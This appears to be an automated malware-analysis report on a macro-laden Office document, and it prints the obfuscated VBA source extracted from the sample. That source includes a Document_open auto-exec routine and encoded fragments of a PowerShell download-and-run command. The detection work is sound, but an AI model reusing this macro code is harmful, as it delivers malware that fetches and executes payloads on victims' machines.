Verdict: MALICIOUS
Risk Score: 162
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro is present and utilizes the Shell() function, indicating an attempt to execute arbitrary code. This macro likely serves to download and execute a secondary payload, a common technique for malware delivery. The presence of VBA macros and the execution of Shell() strongly suggest a macro-based attack.
Heuristics (5)
- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open macro
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35913 bytes |

SHA-256: f1b359684b2a80ca39a8e212a538f9d80303c9f58c082f3f6c19a050bc848f4a

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "whItoJm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub IMsYT(jukrN)
aufEaz = 6921 * NjOEZR + 93876 * ChrB(16150 * Rnd(13473) - 22021 + dMJUUM) - 50275 - Rnd(CMuYv) + 1116 - htriqW * 96359 * Chr(wYznw)
End Sub
Sub JYnZz(nQZKrA)
BdTKTD = 67724 * DRYUVi + 87704 * ChrB(21364 * Rnd(92320) - 44686 + bKtoG) - 99062 - Rnd(QDQThq) + 80891 - wofNij * 29739 * Chr(FHOEd)
tFdmS = 48300 * IoMLWn + 61949 * ChrB(38501 * Rnd(69771) - 68870 + ijiEfi) - 85871 - Rnd(Msnhsu) + 35177 - JKpuY * 32597 * Chr(oASCH)
jwVXjZ = 88645 * pavud + 25222 * ChrB(64381 * Rnd(40122) - 14571 + QEdWJ) - 89780 - Rnd(JNYtEM) + 62268 - tcuRKL * 40561 * Chr(mUkuz)
End Sub
Sub DiTswl(SMoah)
MVikN = 28646 * kknCz + 17342 * ChrB(91057 * Rnd(62164) - 81537 + ZApOJ) - 88488 - Rnd(MOuha) + 31536 - rcnJC * 16777 * Chr(XfqKTr)
upqWc = 18680 * asICb + 9206 * ChrB(46758 * Rnd(98299) - 38861 + KThLVV) - 73659 - Rnd(hSCUwE) + 81706 - IRYEK * 96162 * Chr(qQkfG)
End Sub
Private Sub Document_open()
On Error Resume Next
DLYLOA = 99056 * FZUEs + 89690 * ChrB(82408 * Rnd(25393) - 10501 + DLYwHa) - 30504 - Rnd(MNqvl) + 80655 - DdHdJk * 8532 * Chr(tDrDAR)
pwFUiSLsr (PdLqb + qsRdlRBDsEsoq + BHEzvz)
mTJoiY = 79275 * jjvJz + 39653 * ChrB(61080 * Rnd(85974) - 30027 + PzIzN) - 69053 - Rnd(OjCWDj) + 27596 - QEatCZ * 53088 * Chr(mjuPhb)
End Sub
Sub VOoafw(oFZuQo)
ujChWj = 30524 * zMwnW + 42911 * ChrB(32843 * Rnd(36935) - 39219 + mJjHO) - 12905 - Rnd(olPUTI) + 17382 - przriL * 85934 * Chr(QPcbr)
IXmFhd = 60622 * nSvwi + 95820 * ChrB(99822 * Rnd(71626) - 60049 + pBhiR) - 52949 - Rnd(BuwQrm) + 59246 - McshOa * 61354 * Chr(jDhvj)
uKikXm = 82272 * iGKTji + 63831 * ChrB(80644 * Rnd(93678) - 61517 + IWVHD) - 32664 - Rnd(Jtzajf) + 5818 - znlGO * 84641 * Chr(RwlWut)
End Sub
Sub atHBib(ZDbTu)
zwDXfQ = 16830 * tEqRYI + 8303 * ChrB(44782 * Rnd(42216) - 62422 + jMTET) - 64813 - Rnd(bRZkK) + 74112 - OCVuO * 83735 * Chr(lNjoQk)
End Sub
Sub SCChu(KRdrjp)
orJJtD = 95692 * FjcHo + 83184 * ChrB(97431 * Rnd(97921) - 75501 + DzuJO) - 45792 - Rnd(PoJzZ) + 56177 - ZMqtD * 43320 * Chr(MmvNTZ)
GGMSqc = 62600 * kfclHi + 29043 * ChrB(77965 * Rnd(25839) - 61656 + RicAF) - 90934 - Rnd(UqLzv) + 90999 - cJizij * 2112 * Chr(hcLQRP)
End Sub
Attribute VB_Name = "zzihNIrdF"
Sub XZHqj(jhniVj)
iwEmAz = 79683 * dBEsNR + 28030 * ChrB(65350 * Rnd(80066) - 70851 + cqHJto) - 1871 - Rnd(cjdkvQ) + 12325 - kIWriQ * 35444 * Chr(YDzSTU)
End Sub
Function qsRdlRBDsEsoq()
On Error Resume Next
EDXVn = 26484 * wljSNN + 25654 * ChrB(48838 * Rnd(39834) - 33785 + dQUfUW) - 35835 - Rnd(nOmvmU) + 3699 - zlGmMa * 92581 * Chr(BZNpA)
ibccJPaL = CDMRFI("3ZhJ9'+'+ZxI57ZxI+ZxINgFZxI+ZxItN(),ZxI+ZxI 64vSZxI+ZxIDC)'+';&(ZxI+ZxIHUaZxI+ZxI'+'InvoHUaZxI+ZxI+ZxI+ZxIHUZxI+ZxIak'+'HZxI+ZxIUa+HUZxI+ZxIae-ItZxI+ZxIemHUZxI+Zxs,", qApvaz - qApvaz + 6 + qApvaz - qApvaz, qApvaz - qApvaz + 157 + qApvaz - qApvaz)
HNSXrj = 96912 * jBCza + 53663 * ChrB(17681 * Rnd(80384) - 93680 + LdNnOi) - 50419 - Rnd(UHivI) + 56328 - NHZcPc * 41152 * Chr(aCEkNA)
jzGVwk = 18598 * AkUXw + 20177 * ChrB(74442 * Rnd(52517) - 9103 + viBwIE) - 89887 - Rnd(jIaSL) + 51521 - MHjSNq * 17434 * Chr(XMCHwB)
XhjhbK = CDMRFI("b.ZTVxIClient;64vZxI+ZxINSB = 64vnsZxI+ZxIadasZxI+ZxId.nextZxI+ZxI(10'+'000,ZxI+ZxI 282133)ZxI+ZxI;64vZxI+ZxIAZxI+ZxIDCX = HUa ZxI+ZxI hZxI+ZxItZxI+ZxItp:ZxI+ZxI/ZxI+ZxI/1ZxI+ZxI8EaY3", DLcPi - DLcPi + 6 + DLcPi - DLcPi, DLcPi - DLcPi + 174 + DLcPi - DLcPi)
HlcVb = 60298 * kpCanA + 2157 * ChrB(78345 * Rnd(64966) - 46474 + qlCGIr) - 93460 - Rnd(HijGzz) + 18803 - Bpqqw * 4338 * Chr(XqQmCI)
zmmQk = 17725 * IIfuU + 2609 * ChrB(15855 * Rnd(25399) - 35310 + QYjYOb) - 47512 - Rnd(wobbzq) + 46449 - CZwAji * 18844 * Chr(ZcFlKJ)
zFpYL = CDMRFI("BCAtlT1+'ZxI+ZxI(HUa@ZxI+ZxIHZxI+ZxIUa);64vZxI+ZxISZxI+ZxIDZxI+ZxIC ZxI+ZxIrd", iiiNG - iiiNG + 8 + iiiNG - iiiNG, iiiNG - iiiNG + 68 + iiiNG - iiiNG)
rcbENA = 2219 * KNdmUw + 6
... (truncated)